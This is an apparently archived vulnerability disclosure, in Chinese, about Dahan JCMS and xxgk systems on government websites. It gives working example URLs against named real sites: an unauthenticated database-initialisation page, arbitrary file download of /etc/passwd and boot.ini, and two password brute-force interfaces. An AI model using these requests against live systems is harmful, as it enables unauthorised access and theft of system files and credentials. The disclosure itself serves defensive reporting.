漏洞概要
关注数(24)
关注此漏洞
漏洞标题:大汉相关系统漏洞合集(完结篇)
提交时间:2014-03-06 09:24
修复时间:2014-06-04 09:25
公开时间:2014-06-04 09:25
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2014-03-06: 细节已通知厂商并且等待厂商处理中
2014-03-06: 厂商已经确认,细节仅向厂商公开
2014-03-09: 细节向第三方安全合作伙伴开放
2014-04-30: 细节向核心白帽子及相关领域专家公开
2014-05-10: 细节向普通白帽子公开
2014-05-20: 细节向实习白帽子公开
2014-06-04: 细节向公众公开
简要描述:
太折腾了,没精力了,太累了,完结篇了,以后估计不看鸟。而且厂商给的rank……rank不是你的,都算乌云的……不用太吝啬这个东西。
简单提下内容:
基本所有系统都存在的一处越权;
JCMS & xxgk 通用的一处任意文件下载;
JCMS & xxgk 通用的两处暴力破解接口;
就这么当完结篇了!冲击我的1000rank,然后该稍微歇着了。
详细说明:
基本所有系统大部分版本都还存在的一个越权:
初始化数据库到指定IP数据库服务器去的,大部分系统大部分版本都是处于没有验证的状态。
给案例
Source:
http://www.gansu.gov.cn/source/setup/opr_initdb.jsp?dbip=1.1.1.1&db_port=1433&dbname=test&dbuser=admin123&dbpwd1=admin123&dbtype=2
Jiep:
http://www.gansu.gov.cn/jiep/setup/opr_initdb.jsp?dbip=1.1.1.1&db_port=1433&dbname=test&dbuser=admin123&dbpwd1=admin123&dbtype=2
Vipchat:
http://www.liaocheng.gov.cn/vipchat/setup/opr_initdb.jsp?dbip=1.1.1.1&db_port=1433&dbname=test&dbuser=admin123&dbpwd1=admin123&dbtype=2
LM
http://www.liaocheng.gov.cn/lm/setup/opr_initdb.jsp?dbip=1.1.1.1&db_port=1433&dbname=test&dbuser=admin123&dbpwd1=admin123&dbtype=2
漏洞证明:
JCMS & xxgk 任意文件下载
关键代码:
其中filename为绝对路径。
先看xxgk的案例:
http://xxgk.qidong.gov.cn/gov/m_5_9/downfile.jsp?filename=/etc/passwd&savename=1
http://xxgk.tzhl.gov.cn/xxgk/m_5_9/downfile.jsp?filename=/etc/passwd&savename=1
http://xxgk.qidong.gov.cn/gov/m_5_9/downfile.jsp?filename=/etc/passwd&savename=1
再看JCMS的案例:
http://www.xwzf.gov.cn/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=1
http://www.huimin.gov.cn/jcms/m_5_9/downfile.jsp?filename=c:/boot.ini&savename=1
暴力破解1——某接口可以暴力破解用户名密码
http://www.gansu.gov.cn/xxgk/interface/web.jsp?userid=admin&password=#####
正确情况下的回显:
错误情况下的回显:
工具测试发了5000多个请求,没问题,可破解成功,错误是33b,正确的56b
Jcms也是有用到类似的代码的:
http://www.huimin.gov.cn/jcms/interface/web.jsp
暴力破解也是可行的。
暴力破解2——另一接口也可以暴力破解
http://www.gansu.gov.cn/xxgk/interface/verify.jsp
密码正确的情况:
错误的情况:
Jcms案例:
http://www.huimin.gov.cn/jcms/interface/verify.jsp
不再进行测试。
最后附送一处好像是越权的地方,厂商自己评估是否是开放给民众下载的通道:
http://www.gansu.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/downinfo.jsp
修复方案:
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-03-06 10:06
厂商回复:
非常感谢您对大汉产品的关注以及对产品安全方面的指正,已经安排处理
最新状态:
暂无
漏洞评价:
评论
-
2014-03-06 09:29 |
Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)
-
2014-03-06 09:33 |
pandas ( 普通白帽子 | Rank:585 漏洞数:58 | 国家一级保护动物)
-
2014-03-06 09:37 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
@pandas 不搞了,累。挖不出漏洞了就撤了哈。
-
2014-03-06 09:38 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
2014-03-06 10:01 |
xiaokinghk ( 实习白帽子 | Rank:82 漏洞数:16 | 【DBA】)
-
2014-03-06 10:35 |
刺刺 ( 普通白帽子 | Rank:603 漏洞数:52 | 真正的安全并不是技术,而是人类善良的心灵...)
诚如洞主所言,rank给的太低,(礼物难道又是杯子和移动电源),打击了洞主的JJ性,而我们也失去了向洞主进一步学习的机会。假如rank能给高一点,我肯定会插一杠,抢点边角料的,哈哈。
-
2014-03-06 10:46 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
2014-03-06 10:47 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
2014-03-06 15:07 |
Haswell ( 普通白帽子 | Rank:167 漏洞数:18 | HorizonSec @ RDFZ)
-
2014-03-06 18:54 |
在路上 ( 普通白帽子 | Rank:193 漏洞数:13 | 在学习的路上、在成长的路上...)
-
2014-03-06 21:04 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
2014-03-06 22:24 |
一只猿 ( 普通白帽子 | Rank:463 漏洞数:89 | 硬件与无线通信研究方向)
-
2014-03-07 15:27 |
在路上 ( 普通白帽子 | Rank:193 漏洞数:13 | 在学习的路上、在成长的路上...)
-
2014-03-10 13:48 |
Bloodwolf ( 实习白帽子 | Rank:47 漏洞数:8 | whoami)
-
2014-06-04 09:31 |
loli ( 普通白帽子 | Rank:550 漏洞数:52 )
-
2014-06-04 11:23 |
j14n ( 普通白帽子 | Rank:114 漏洞数:23 | 我是一只小小小小鸟....)